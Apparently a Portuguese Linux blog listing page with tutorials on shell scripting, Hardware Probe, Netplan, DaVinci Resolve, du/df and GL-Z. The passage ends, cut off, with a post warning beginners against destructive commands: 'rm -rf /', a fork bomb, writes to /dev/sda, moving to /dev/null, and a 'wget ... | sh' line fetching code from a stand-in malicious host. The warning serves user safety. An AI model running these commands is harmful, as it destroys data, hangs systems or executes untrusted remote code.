Diolinux - O modo Linux e Open Source de ver o Mundo

Responsive Ad Slot

Mostrando postagens com marcador dica. Mostrar todas as postagens
Mostrando postagens com marcador dica. Mostrar todas as postagens

5 Dicas PRO para Shell Script

Nenhum comentário

segunda-feira, 1 de abril de 2019

Dizem que depois que você aprende o Terminal é que você realmente começa a entender Linux profundamente. Seja isso uma verdade ou não, de fato, é verdade que dominar o terminal te dá algumas vantagens em relação ao que você pode fazer com o seu sistema. Hoje você vai conferir 5 dias para quem quer ser um PRO no Shell Script.







1 - Portabilidade dos seus Shell Script



Muitas vezes indicamos automaticamente o caminho da Shebang como #!/bin/bash, no entanto, se o Bash estiver instalado num diretório diferente (como em sistemas como FreeBSD, OpenBSD e algumas distros Linux) provavelmente ela não conseguirá encontrar o interpretador e seu programa/script não funcionará.

Logo, a melhor maneira de você evitar esse tipo de problema é indicar o caminho da env que é padrão em todos os sistemas e a mesma se encarrega de redirecionar pro caminho onde o interpretador está localizado. Então, procure sempre iniciar seus programas/scripts com o seguinte caminho após a Shebang:

#!/usr/bin/env bash

O mesmo vale para outros Shells: ZSH, FISH, etc.

2 - Procure sempre pôr cabeçalho nos seus scripts


Os cabeçalhos são importantes para que a pessoa saiba pra que serve seu programa/script, como lhe contactar em caso de algum problema, qual a forma de utilização e entre diversos outros pontos positivos.

Geralmente num cabeçalho deve haver o "help", "changelog", "TODO", "FIXME",... ou seja, diversas informações necessárias. No entanto, em resumo, algumas informações são fundamentais, tais como: Descrição do script; Autor; Versão e Licença. Veja abaixo um exemplo mínimo e básico de um cabeçalho:

# autor: Nome Sobrenome <site.dominio>
# descrição: O que seu Script/Programa faz 
# version: 1.0
# licença: MIT License

O exemplo acima está em Português, mas é interessante deixá-lo em Inglês, para ficar ainda mais global.

3 - Separe por função


O motivo inicial da Linguagem Orientada à Objetos é a organização. No entanto, linguagens procedurais ou estruturais podem manter a organização separando cada "transformação" em funções . Em Shell Script, você pode declarar uma função em duas formas de sintax, veja abaixo ambas as formas:

USANDO a palavra function
function minha_funcao(){
echo "Minha função"
}
Ou SEM USAR a palavra function
minha_funcao(){
echo "Minha função"
}
Para chamar a função, basta invocar o nome da função no script, ex.: minha_funcao

4 - Deixe seu código com indentação


No Shell Script, como na maioria das linguagens de programação, a indentação não é obrigatória, no entanto, ela é interessante para deixar seu código mais organizado, então procure sempre manter seu código indentado.

Uma dica legal é se você usar o editor Vim , basta você selecionar tudo pressionando a tecla ESC e em seguinda combinando as teclas ggVG , após tudo selecionado, basta agora teclar duas vezes o sinal de igual == e seu código será automáticamente indentado. Mágica! :)

5 - Declare nomes descritivos


Quando criar nomes de variáveis e de funções, procure descrever (não tanto, lógico) e separando com underline **_** , pois ficará mais profissional e menos provável de haver conflito de nomes e situações desagradáveis, alguns exemplos de como descrever: set_name, get_name, display_info_start, etc.
  
Se você ainda não domina Shell Script e o Terminal Linux. Aproveite uma promoção onde você pode adquirir 5 CURSO DO TERMINAL LINUX incluindo Shell Script, Expressões Regulares, Vim e Sed. Clicando nesse link http://bit.ly/Promo5pg para adquirir com o PagSeguro ou nesse link http://bit.ly/5CursosLinux para adquirir com o PayPal. Se quiser mais detalhes da promoção veja essa postagem: 5 Cursos do Terminal Linux para você! .

Esse artigo foi escrito em parceria com a galera do Terminal Root, os quais são os autores dos cursos mencionados acima, até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Teste automaticamente seu computador com o utilitário Hardware Probe

Nenhum comentário

terça-feira, 26 de março de 2019

No mundo da informática é comum passarmos por problemas envolvendo hardware, seja incompatibilidades, desgaste natural ou quaisquer outros tipos de defeitos. Testar componente por componente atrás de um possível erro, nem sempre é uma tarefa simples. É comum quando alguém está nos ajudando através de um fórum (lá no Diolinux Plus por exemplo) perguntar sobre a versão do kernel, qual o nosso sistema, hardware etc; E nem sempre o usuário sabe prontamente como conseguir tais informações.

utilitario-informação-hardware-probe-info-componentes-pc-linux

O utilitário Hardware Probe é perfeito para tais situações, com ele você poderá conseguir informações de seus componentes e ao mesmo tempo efetuar um breve teste automático, que pode dar uma pista de qual hardware está com mau funcionamento.

Além de verificar a operabilidade do seu computador, você contribui com um banco de dados de hardware no Linux, auxiliando o estudo de Teste de Confiabilidade Real no HDD/SSD e os desenvolvedores Linux

utilitario-informação-hardware-probe-info-componentes-pc-linux

Ao rodar o teste (após a instalação um ícone aparecerá no menu de seu sistema), o terminal se abrirá e uma URL permanente para visualização do probe do computador será gerada, copie e abra em seu navegador favorito. Com diversas informações úteis para diagnósticos de possíveis problemas, esses dados podem ser compartilhados para consultas de componentes (devices), logs e periféricos do hardware em questão, simplificando todo o processo. 

Algo a salientar, é que seus dados pessoais não são capturados pelo Hardware Probe, mantendo o anonimato e coletando apenas informações necessárias, então calma que endereços IPs, MACs, serials, hostname, username, etc; Não serão coletados.

utilitario-URL-informação-hardware-probe-info-componentes-pc-linux

Instalando o utilitário Hardware Probe em seu sistema


O Hardware Probe está disponível oficialmente no seu Github em diversos formatos, RPM, DEB, Snap, AppImage e o pessoal do Flathub também disponibilizou em Flatpak.

No Linux Mint pesquise no Gerenciador de Aplicativos por: “Hardware Probe” e instale a versão em Flatpak que aparecerá na loja.

utilitario-informação-hardware-probe-info-componentes-pc-linux-mint-flatpak

Instalação do Hardware Probe Flatpak via terminal.

flatpak install flathub org.linux_hardware.hw-probe

Caso queira usar a versão em Flatpak no Ubuntu, acesse esse post de como configurar o suporte a esse tipo de empacotamento no sistema da Canonical e seus derivados.

No Ubuntu pesquise no Software Ubuntu por: “Hardware Probe” e instale a versão em Snap.

utilitario-informação-hardware-probe-info-componentes-pc-linux-ubuntu-snap

Instalação do Hardware Probe Snap via terminal.

sudo snap install hw-probe 

Já se deseja a versão Snap no Linux Mint ou outras distros, veja como adicionar o suporte ao seu sistema no seguinte post.

Como informado anteriormente, existem outros formatos como RPM, DEB e AppImage, você pode baixá-los diretamente do Github do projeto por esse link, no entanto testei o software em duas versões diferentes do AppImage e ao menos no Ubuntu o mesmo não funcionou, em Flatpak e Snap seu funcionamento foi perfeito. 

utilitario-informação-hardware-probe-info-componentes-pc-linux

Com esse utilitário será bem simples compartilhar as informações de seu hardware e sistema, então aconselho a sempre quando postar alguma dúvida de algum problema em seu hardware no fórum Diolinux Plus, adicionar juntamente a URL com as infos, assim as pessoas poderão ter uma base na hora de te auxiliar.

E você conhecia o Hardware Probe? Que tal continuar essa discussão sobre esse programa lá em nosso fórum Diolinux Plus

Espero você até a próxima postagem, aqui no blog Diolinux, SISTEMATICAMENTE! 😎

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Como configurar a rede no Ubuntu Server através do Netplan

Nenhum comentário

quinta-feira, 7 de março de 2019

Há algum tempo o nosso querido Ubuntu Server mudou consideravelmente a sua forma de configuração de rede padrão, se antigamente nós configurávamos as nossas placas de rede em /etc/network/interfaces, à partir do Ubuntu 18.04 LTS (Server ou não) as configurações de rede devem ser feitas através do "netplan". Aprenda a fazer essa configuração.

Configuração de Netplan Ubuntu






Para configurar a rede no Ubuntu Server, atualmente, você deve navegar até o diretório /etc/netplan, onde será possível encontrar um arquivo com a extensão .yaml, é nele que você deve fazer os seus ajustes.

Entendendo a formatação e configuração do arquivo .yaml de rede


Eu sei, "old habits die hard", mas o novo formato permite um único tipo de configuração de rede em todas as versões do Ubuntu disponíveis, do seu desktop até a "internet das coisas", e bom, mesmo que você não goste muito da ideia de mudar, francamente, não há muito que você possa fazer nesse sentido, porém, a configuração atual é, na verdade, extremamente simples.

Dica: Para editar estes arquivos eu vou usar o editor de textos "nano", no meu caso a sintasse para abrir o arquivo de configuração seria:
sudo nano /etc/netplan/50-cloud-init.yaml
Verifique qual o nome do seu arquivo de configuração de rede com:
ls /etc/netplan/
Esta é a imagem de um arquivo de configuração de um dos meus servidores:

Configuração de rede no Ubuntu Server

O arquivo por si só já é identado, então, recomendo tomar esse cuidado na organização, isso vai fazer com que seja realmente simples de entender tudo.

Indicado com a seta, você tem o nome (ID) da sua placa de rede.

Logo abaixo você tem:

- Endereço do IP que você quer para a máquina, seguido de uma máscara de sub-rede, declarada nesse caso com um simples "/24" (255.255.255.0);

- gateway4 para IPV4, se você for usar IPV6, terá de declarar como "gateway6";

- dhcp4 para IPV4, suportando "verdeiro" ou "falso" para DHCP ativo ou não, com as palavras em Inglês "true" e "false", asssim como o gateway, caso você vá utilizar IPV6, ele deve ser declarado como "dhcp6";

- "optional" define se essa placa de rede deve ser aguardada (false) ou não (true) na hora do boot para iniciar o sistema;

- Por último você deve configurar o seu DNS sob "nameservers". Observe a identação, você pode adicionar mais de um DNS na mesma linha, apenas separando-os por vírgula, é bem simples de entender observando o exemplo acima.

Observe, na imagem acima também, como é feita a organização das informações para que tudo saia corretamente. Antes de fazer qualquer alteração nesse arquivo, você pode, é claro, fazer um backup dele.

Configurando DHCP no arquivo de Netplan


A configuração de rede do Ubuntu Server pode ser feita no momento da instalação, se você marcar para ele usar DHCP ou ignorar a configuração de rede, esse será o comportamento padrão do sistema, porém, caso você tenha alterado alguma configuração ou queira fazer algum tipo de teste, o DHCP padrão do Ubuntu Server se configura dessa forma:

Configuração de rede Ubuntu Server

E claro, você pode mesclar as coisas e adicionar configurações extras, como  usar um DNS específico.

Dica: Como descobrir o ID da minha placa de rede?

Como você deve ter percedido, é necessário declarar a sua placa de rede para então fazer as configurações adequadas. Geralmente o próprio Ubuntu adincionará essa identidade ao arquivo por padrão se as placas estiverem no servidor na hora da instalação, mas em caso de dúvida, use o comando:
ip address
Mesmo sem internet no computador você verá um resultado semelhante a esse, observe o local onde a placa de rede é exibida:

Configuração de rede no Ubuntu Server

Se precisar estudar mais o netplan para fazer configurações menos comuns, basta consultar o manual:
man netplan
No site da Canonical você encontra uma versão web desse manual.


Testando e aplicando o "seu plano de rede"


O "Netplan" possui alguns recursos interessantes, como uma ferramenta para testar se a configuração está funcional, antes de você aplicar mudanças:
sudo netplan try
Dessa forma o "Netplan" tentará implementar a suas modificações no sistema, caso algo dê errado, ele vai te avisar. Nesse caso, eu escrevi a palavra "true" errado propositalmente para mostrar o resultado, veja:

Configuração Ubuntu Server

Ajustando esse erro e repetindo o teste:

Configurando o Netplan no Ubuntu

Repare que agora o meu arquivo de configuração foi aprovado como "funcional", eu posso aplicar a modificação ao sistema simplesmente pressionando "enter" novamente, caso contrário, em 2 minutos o arquivo será revertido ao padrão anterior.

Caso você já saiba fazer as modificações e simplesmente queira aplicar direto as suas configurações, basta rodar:
sudo netplan apply
Como você pode ver, especialmente se você era um dos que constumava fazer ajustes em  /etc/network/interfaces, aqui não é necessario reiniciar nenhum serviço ou mesmo o servidor. No entanto, vale a pena observar que caso você edite o seu arquivo (com o nano por exemplo),  o salve, e depois reinicie o seu computador, ele vai usá-lo como "netplan" sem a necessidade do "apply".

Uma forma nova de configurar o seu Ubuntu Server


Apesar de eu ter tratado isso como algo novo, esse método já está disponível para as pessoas que vão usar o Ubuntu Server há praticamente um ano e não é necessariamente mais difícil do que o modo antigo, é apenas diferente. De fato, tirando o nome meio esquisito que o seu "yaml" pode ter, o resto é simples até demais.

Espero que o artigo tenha ajudado, se ele lhe foi útil, não esqueça de compartilhar, até a próxima!

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Como instalar o DaVinci Resolve no Linux

Nenhum comentário

quinta-feira, 28 de fevereiro de 2019

O DaVinci Resolve é um software da Black Magic Design, uma famosa empresa de equipamentos para filmmakers profissionais, que também é responsável por um dos melhores softwares da atualidade para edição e pós-produção de vídeo. Hoje você vai aprender a instalar o DaVinci Resolve na sua distro Linux.

Como instalar o DaVinci Resolve no Linux






O DaVinci Resolve é um software extremamente completo, capaz de trabalhar com edição de vídeo profissional, composição, edição de áudio e color grading e está disponível para Linux, macOS e Windows em uma versão gratuita e uma versão paga (DaVinci Resolve Studio).


A versão grátis é muito poderosa e pode resolver os problemas da maior parte dos produtores de conteúdo e é essa versão que você vai aprender a instalar no seu Linux.

Temos também a versão em vídeo deste tutorial:


Fazendo o download do DaVinci Resolve para Linux


O primeiro passo é acessar o site do software e rolar (muito) a página até a parte de baixo onde você encontrará as opções de downloads para cada sistema operacional, enquanto observa as várias funcionalidades do software que são exibidas na página.

DaVinci Resolve Download

Nessa região você encontrará a versão grátis e a paga, basta escolher a desejada. Uma curiosidade interessante em relação a versão paga, é que se você comprar qualquer câmera da Black Magic, a versão Studio do DaVinci Resolve vem de brinde, bacana, né?

No nosso caso vamos baixar a versão gratuita (Free), basta clicar no botão referente à versão.

Download DaVinci Resolve Linux

Na próxima tela você verá as opções de download disponíveis, incluindo a versão de Linux, basta clicar no botão referente.

O próximo passo é um pequeno formulário de cadastro que deve ser preenchido, caso você baixe a versão Studio ele não é necessário, porém, na versão grátis, sim. Preencha com as informações requeridas.

Download do DaVinci Resolve no Linux

Depois de fazer o cadastro você efetivamente poderá fazer o download do software.

DaVinci Resolve Download para Linux

O arquivo tem cerca de 900 MB de tamanho e vem compactado no formato .zip.

Instalação do DaVinci Resolve no Linux


*Essa era uma parte consideravelmente complicada até pouco tempo, temos aqui no blog um tutorial completo para a instalação do Resolve no Ubuntu e também um outro tutorial mostrando como transformar o instalador em um .deb, ambos devem ser usados apenas em caso de necessidade.

Atualmente a Black Magic melhorou muito a forma com que o software é distribuído e incluiu todas as dependências e libs diretamente no instalador, fazendo com que a instalação no Linux seja extremamente simples, tanto quanto no Windows ou no macOS.

O primeiro passo é extrair os arquivos do arquivo compactado que você baixou.

Davinci Resolve extração

Com essa extração uma pasta será criada com o nome do programa, você pode entrar nela, onde encontrará dois arquivos, um instalador no formato .run e um pdf com um manual de instruções.

Tudo o que você precisa fazer é dar dois cliques no arquivo .run e o instalador vai se abrir.

*Caso não funcione, verifique o arquivo está com as permissões de execução através do menu "propriedades", clicando com o botão direito sobre ele e observando a aba "permissões.

Instalação do DaVinci Resolve

À partir de agora o instalador é completamente guiado, basta avançar pelas etapas observando as opções disponíveis. Durante a instalação será solicitada a sua senha de Root pelo menos duas vezes para a instalação de alguns arquivos em certos diretórios, basta confirmar digitando a sua senha e aguardar a instalação processeguir até o seu final.

Na dúvida, consulte o manual que vem com o programa.

Quando o procedimento finalizar, o programa já estará instalado, basta procurar pela aplicação no menu do seu sistema.


Configuração do DaVinci Resolve no Linux


Ao abrir o software pela primeira vez você poderá fazer um "setup" inicial, configurando algumas das suas preferências, como local onde deseja armazenar os seus arquivos de mídia, configuração de padrões da teclas de atalho (usar as do Adobe Premiere, FinalCut e Avid Media Composer são algumas opções), além de fazer uma verificação de se o hardware instalado está adequado para o trabalho e a configuração dos padrões dos seus projetos, como a resolução.


Configuração do DaVinci Resolve
Começando a conifguração do DaVinci Resolve

Configuração do DaVinci Resolve
Verificação de compatibilidade

Configuração do DaVinci Resolve
Definição de padrões do projeto

Configuração do DaVinci Resolve
Seleção da pasta adequada para armazenar as suas produções

Todas as configurações aqui feitas poderão ser alteradas posteriormente nas configurações do próprio DaVinci Resolve através do menu de mesmo nome no programa.

Dicas para usuários da versão Free do Resolve no Linux


Configurando DaVinci no Linux

No Linux o DaVinci Resolve não tem decoração nas janelas, talvez isso seja alterado no futuro, talvez não, mas de toda forma, apesar de ser um software que você sempre vai querer trabalhar em tela cheia, é possível manipular a janela segurando a tecla "Alt+Clique do botão esquerdo do mouse" para movimentá-la, ou "Alt+F7", você também pode usar "Alt+F8" para redimencioná-la se quiser.

A versão do Resolve livre de custos possui limitações em relação a codecs, de modo que pode ser necessário capturar as suas mídias em formatos suportados na versão grátis (ver manual do programa), ou então converter os seus arquivos capturados em formatos diferentes.

Convertendo arquivos para o DaVinci Resolve Linux


Para tal, nós preparamos um outro artigo aqui no blog que faz uso do poderoso FFMPEG, através de uma de suas interfaces chamada WINFF (Disponível também para Windows), com um script que converte facilmente qualquer arquivo para um formato que o DaVinci possa trabalhar sem problemas.

Para saber mais sobre essa ferramenta, basta acessar este artigo: "Convertendo vídeos para trabalhar no Davinci Resolve no Linux".

É interessante observar que o DaVinci Resolve requer um bom hardware para funcionar bem, em especial placas de vídeo, porque a maior parte (se não todos) os seus recursos de edição são trabalhados pela GPU, no Linux temos um desempenho (generalizando) melhor com placas da Nvidia atualmente, então tenha certeza de ter os seus drivers instalados corretamente.

Ficou alguma dúvida? Conheça o nosso fórum, você pode ter suporte por lá.

DaVinci Resolve não abre por falta de uma biblioteca


Dependendo da sua instalação, pode ser que uma biblioteica relacionada ao seu driver de vídeo não seja instalada e por conta dela, a versão atual do DaVinci Resolve não consegue ser executada. Eu tivesse problema apenas uma vez, mas acho que vale a pena deixar a dica registrada.

DaVinci Resolve Linux lib

Caso você clique no ícone do DaVinci Resolve e nada aconteça, pode ser que algum componente assim esteja faltando. Para ter certeza de qual componente é esse, rode o seguinte comando no terminal:
/opt/resolve/bin/resolve
E observe o erro que aparecer, no meu caso era a ausência da "libOpenCL", bastando instalar, neste caso pela loja do Mint, o pacote "ocl-icd-libopencl1", que foi encontrado pesquisando simplesmente por "libopencl". Depois da instalação o DaVinci Resolve iniciou normalmente.


Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Comando DU no Linux - Como ver o tamanho de arquivos e diretórios pelo terminal

Nenhum comentário

quinta-feira, 24 de janeiro de 2019

Eu pretendo começar uma série de artigos aqui no blog falando sobre comandos úteis no terminal, além de algumas dicas de configurações mais avançadas. Esse tipo de artigo acaba servindo como documentação extra oficial e referência para futuros artigos e vídeos que nós produziremos. Hoje vamos falar sobre o 'du'.

Comando DU Disk Usage no Linux






Imagine que você esteja mexendo no seu servidor e querendo saber quanto de espaço algum arquivo ou pasta está ocupando, o que você faria? Em modo gráfico você pode utilizar alguns softwares como o "Analisador de uso de Disco" que é excelente, olha só:


Mas caso você não tenha modo gráfico ou simplesmente queira fazer a verificação via terminal, existe um utilitário muito legal e poderoso chamado "du", uma abreviação de "disk usage", ou "uso de disco", em Português.

Como utilizar o comando DU


O comando "du" geralmente está presente em todas as distros Linux por padrão, pois faz parte do Core Utils, para saber mais sobre a sua utilização você pode usar o comando:
du --help
du-help-linux
Existem mais opções do que as mostradas nessa imagem...
Através do comando de ajuda (--help) você consegue ver todos os parâmetros comuns que o "du" te oferece, mas vamos para alguns casos práticos e algumas dicas para você utilizar ele.

A funcionalidade do "du" é simples, você usa ele com o diretório ou arquivo que quer analisar, por exemplo:
du /home
Comando du exibindo blocos


Você verá que a saída desse comando será gigantesca, listando todos os diretório acessíveis com a permissão do seu usuário (seja o normal ou o root), o problema é que o comando "du" sem parâmetros mostra os valores de espaço em blocos de disco (f*ck yeah!), o que é um pouco complicado de entender, por isso existe um parâmetro "-h", que está ali para "humanos", ou seja, para você entender os espaços, medindo os valores em GB, MB, KB, etc. Por exemplo:
du -h /home 
comando DU mostrando unidades legíveis

Como você pode ver na imagem acima, podemos ver que os os diretórios agora tem valores mais simples de entender.

Ainda assim, esse comando mostra todos os diretórios de forma individual, o que dá uma saída muito grande realmente, se você quiser exibir apenas o tamanho total, use também o parâmetro "-s" de "summarize". Ele pode ser escrito de diversas formas, veja:
du -h -s /home
du -hs /home
du -sh /home 
Todos eles lhe entregarão o mesmo resultado, mostrando os diretórios onde a leitura não foi possível por questões de permissão de usuário:

Comando Du mostrando apenas o resultado
Como é possível ver, acaba sendo uma saída muito menor
Particularmente eu gosto de escrever "du -hs diretório_ou_arquivo", porque acabei associando com "head shot" do Counter Strike e acabei nunca mais esquecendo! 😁

Como eu já tinha comentado, você também pode usar o "du" para saber o tamanho de um arquivo, a forma de fazer a medição é muito simples, basta indicar o diretório com o nome do arquivo, ou então apontar o o arquivo, caso você já esteja no diretório. Por exemplo:

Eu tenho uma ISO do Fedora na minha pasta "Downloads" dentro da minha pasta "Home", primeiro navego até ela usando o "cd":
cd ~/Downloads/
Posso dar um "ls" para conferir o nome do arquivo e então rodar um comando "du" mais ou menos assim:
du -hs Fedora-Workstation-Live-x86_64-29-1.2.iso
Medindo arquivos com o DU

Como você pode ver, o terminal me retorna que a ISO do Fedora de cerca de "1.8 GB" de tamanho. Simples, não?

Algumas dicas um pouco mais avançadas para o "du"


Até então você viu a utilização básica do "du" para a medição do tamanho de diretórios e arquivos, mas e se eu quiser organizar a saída do "du" para saber quais arquivos estão ocupando mais espaço, ou para saber quais pastas estão mais cheias de arquivos e ocupando mais espaço, como fazer?

Para isso vamos usar o famoso "pipe" para jogar a saída de um comando em outro. Neste caso vamos usar a saída do "du" e jogá-la no "sort", outro comando bem bacana para ordenar as coisas:
du -hs * | sort -h
O comando acima está dizendo para o "du" usar o modo "humano" e simplificado (--hs) para todos os arquivos do diretório (*), e jogar a saída desse comando (|) para o que o "sort" ordene eles por tamanho usando valores "humanos" (-h).

Eu apliquei esse comando em uma pasta cheia que ISOs de sistema que eu tenho no computador, assim eu consigo saber qual delas é que ocupa mais espaço, a saída foi a seguinte:

usando o du para medir o tamanho das ISOs

Se eu quiser saber qual destas ISOs foi a última que eu baixei, posso usar o "du" dessa forma:
du -h --time *
Você também pode usar o "du" para analisar certos arquivos que contenham ou não contenham algum texto, por exemplo, quero saber o tamanho de todo os "buntus" que eu tenho nessa coleção de ISOs:
du -hs * | grep buntu -h
Contando ISOS do Ubuntu

Funciona exatamente como o exemplo anterior, com a diferença de que o "grep" está pegando resultados que tenham o texto "buntu" e me exibindo.

Como você deve imaginar, existem muitas combinações possíveis, então é bom estudar as opções que o "--help" do "du" te mostra, mas por fim, vou deixar uma última dica, se você quiser saber a soma total do diretório, além de fazer a contagem individual, use também o parâmetro "-c", essa forma:
du -hsc diretório_desejado

DU lendo o tamanho total

Repare que no final do comando você consegue ver o total do diretório.

Toda vez que se fala no "du", muita gente fica pensando em como usá-lo para verificar, não quanto espaço está sendo usado, mas quando espaço resta. Essa lição pode ficar para outro artigo, mas para não deixar você sem a resposta, a forma mais simples de verificar isso não é usando o "du" e sim outro utilitário chamado "df", abreviação para "disk filesystem", você pode usá-lo assim para ver como está a utilização das suas partições:
df -h
O resultado será parecido com isso:

Ver utilização de disco via linha de comando

Espero que o artigo tenha te ajudando a entender um pouco mais das ferramentas que estão disponíveis para você utilizar no seu servidor ou mesmo na sua distro de desktop, caso você goste de usar comandos no terminal. Este é só o primeiro artigo de uma série que eu pretendo fazer para mostrar algumas coisas um pouco mais avançadas do mundo Linux, incluindo configurações de arquivos mais sensíveis do sistema, você não perde por esperar! :)

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


GL-Z - Uma ferramenta para monitorar Vulkan e OpenGL no Linux, Windows e macOS

Nenhum comentário

terça-feira, 22 de janeiro de 2019

Com a crescente de games no mundo Linux, especialmente depois de implementações mais frequentes do Vulkan, criou-se uma demanda para testes, benchmarks e formas de análise, para aferir o desempenho nas plataformas. Hoje você vai conhecer uma ferramenta muito útil para fazer o monitorando do seu CPU e GPU em múltiplas plataformas.

Vulkan API monitoring






Existem muitas ferramentas de monitoramento para Linux, porém, é menos comum encontrar alguma que agrupe várias funcionalidades em "uma coisa' só e ainda por cima funcione exatamente da mesma forma em outros sistemas operacionais para facilitar a comparação. É por isso que o GL-Z é tão interessante.

Quando se fala de Vulkan, a própria API inclui algumas opções para visualização da taxa de FPS, entre outras coisas, nesse aspecto, até mesmo a própria Steam possui um contador de FPS, mas a quantidade de quadros na tela é só um dos fatores que você pode querer monitorar, ainda que para o OpenGL exista o projeto GLXOSD, o GL-Z se torna mais interessante pois, além de monitorar o OpenGL,  também consegue monitorar o Vulkan em todas as plataformas.

Capacidades do GL-Z


Configurações do GL-Z Linux

O GL-Z é um pouco esquisito. A forma principal de trabalhar da aplicação consiste em uma janela que permite a criação de várias outras janelas menores, cada qual responsável por monitorar alguma coisa diferente, como o CPU ou a GPU. Ele funciona exatamente da mesma forma em qualquer sistema, porém, existem variações, você pode rodar janelas menores para monitorar coisas específicas, por exemplo:

Monitorando OpenGL com o GL-Z

Entre os recursos do GL-Z estão:

  • Suporte a multiplataforma, sendo Windows e Linux de 64 bits, macOS e Raspberry Pi;
  • Informações de OpenGL, com dados em geral, extensões, utilizaçãod e memória;
  • Informações sobre o Vulkan, como dados em geral e extensões (assim como no OpenGL) para cada dispositivo Vulkan conectado;
  • Monitorando de CPU, mostrando o uso no Linux e no Windows;
  • Monitoramento da GPU, exibindo uso, temperatura no Linux e no Windows, com a possibilidade de exportar os dados para um arquivo de texto simples;
  • Dados de CPU e GPU podem ser capturados e exportados para um arquivo cvs para análise facilitada.

O GL-Z também tem código aberto e tem arquivos de configuração bem simples de entender e modificar, por exemplo, alterar a imagem que aparece ao fundo da janela, adicionando qualquer uma de seu desejo consiste em apenas modificar um arquivo dentro de uma pasta chamada "data".

A aplicação também tem um impacto mínimo no seu hardware, tornando-a ideal para monitoramento, consumindo apenas 16 MB de RAM e praticamente não fazendo-se presente para o uso do processador e da placa de vídeo.

Download e utilização do GL-Z


O download para qualquer plataforma pode ser feito no site oficial, a versão de Linux vem compactada no formato tar.gz, basta extrair, como você faria com qualquer arquivo do tipo. 

Dentro da pasta onde os arquivos foram extraídos você encontrará os seguintes arquivos:

Executáveis Linux

O GL-Z funciona como uma aplicação portátil, não precisando ser instalado, o que é muito bacana. 

O item circulado é o binário executável, basta dar dois cliques para que ele abra a aplicação principal, caso você tenha algum problema em executá-lo dessa forma, verifique nas propriedades do arquivo se ele está com a opção de execução marcada.

Existem alguns arquivos ".sh" (Shell Scripts) que também pode ser rodados dando dois cliques,  estes estão assinalados com setas na imagem acima, apenas verifique se o seu gestor de arquivos está configurado para abrir esse tipo de arquivo, com ele você consegue abrir variações do GL-Z, como a da imagem acima onde mostramos o software monitorando apenas o OpenGL.

Dicas

- Você pode usar o GL-Z rodando enquanto você joga e ativar a captura de logs através do menu "tools";

- Se quiser ver algum monitor enquanto joga, basta clicar com o botão direito na borda da janela e pedir para que ele fique "sempre no topo";

- Todos os logs de captura de dados que você fizer estarão dentro da própria pasta do programa com o nome "log" em alguma parte do arquivo.

Se você quiser exibir os FPS de forma sobreposta ao game, de forma parecida com o que o FRAPS faz no Windows, use um parâmetro simples na inicialização do jogo, como mostramos neste artigo.

Até a próxima!

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


7 comandos perigosos do Linux que você NUNCA deve executar

Nenhum comentário

quinta-feira, 17 de janeiro de 2019

Como o número de usuários leigos de Linux vem aumentando com o tempo, acho pertinente alertar as pessoas sobre alguns comandos que podem ser perigosos, tanto para o sistema, quanto para os dados contidos no computador.

7 Comandos perigosos do mundo Linux




O terminal é uma ferramenta muito poderosa, por conta disso é bom você dominá-lo, ou pelo menos entendê-lo, para evitar problemas no seu sistema baseado em Linux.
Veja também: O curso no Diolinux EAD para aprender a dominar o terminal
Os grandes problemas que você pode enfrentar usando o terminal de forma indiscriminada normalmente estão atrelados a comandos de sobrescrita de dados, então vamos mostrar alguns aqui que você deve prestar especial atenção quando vir alguém sugerindo que você faça no seu computador com Linux.

Atenção: Você NÃO deve executar nenhum destes comandos no seu computador, isso pode causar danos irreversíveis que nós não nos responsabilizamos, o artigo tem a intenção de ser instrutivo, justamente para evitar este tipo de situação.

1 - rm -rf


É um comando clássico do do Linux que teoricamente não faz nada de mais, ele serve apenas para apagar arquivos, e é aí que mora o perigo. Dependendo da forma que ele for aplicativo o resultado pode ser muito desagradável, por isso é importante você entender o que os comandos fazem, vamos explicar um pouco melhor neste exemplo:
- rm: comando usado no Linux para deletar arquivos.
- rm -r: o comando deleta pastas recursivamente, mesmo que a pastas esteja vazia.
- rm -f: cUsando este parâmetro, o propriedade de "apenas leitura" que um arquivo tenha é removida sem perguntar, permitindo que o arquivo seja apagado.
- rm -rf / : Usando a combinação dos dois parâmetros com a "/" você diz para o sistema apagar tudo que está no diretório raiz do sistema.
- rm -rf * : Força o apagamento de tudo que está no diretório atual ou no de trabalho, dependendo de onde você estiver.
- rm -rf . : Acrescentando um ponto, você pode apagar também as pastas ocultas, além das normais.

Tome muito cuidado ao executar um comando destes, especialmente se for feito como root ou usando o sudo.


Tão perigoso que pode ser este comando, que atualmente o Linux se protege contra ele, se você rodá-lo, mesmo com sudo ou como root, ele não vai funcionar, para isso é preciso usar os parâmetros descritos na imagem acima. Da mesma forma que o Linux protege você de destruir o sistema sem querer, ele também permite que você o destrua mediante a ter certeza de que é realmente isso que você quer, curioso, não é?

2 - :(){:|:&};:


Este comando funciona como uma "Fork Bomb", ele opera definindo uma função chamada ':', que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano, o processo se repete indefinidamente até que o sistema trave.

3 - qualquer comando para > /dev/sda


A forma com que o Linux lê as partições e discos é diferente do Windows, por conta disso, normalmente novatos não conseguem entender em primeira instância como eles são distribuídos. Normalmente a localização dos dispositivos de armazenamento do sistema ficam dentro de /dev, sendo que podem haver vários por ali e normalmente o sda está presente.

O problema do comando acima é que ele redireciona a saída de qualquer comando que seja colocado para o seu bloco de armazenamento, desta foma sobrescrevendo alguns dados e corrompendo outros.

4 - mv pasta/diretório /dev/null


Eu costumava brincar sobre o /dev/null me referindo a ele como o "buraco negro" do Linux. Tudo que é enviado para ele é perdido "para sempre". Então tome cuidado ao mover qualquer coisa para esta localização. O comando mv serve para mover arquivos ou diretórios para o destino indicado, se este destino for o /dev/null você estará mandando seus arquivos pra Nárnia.

5 - wget http://malicious_source -O- | sh


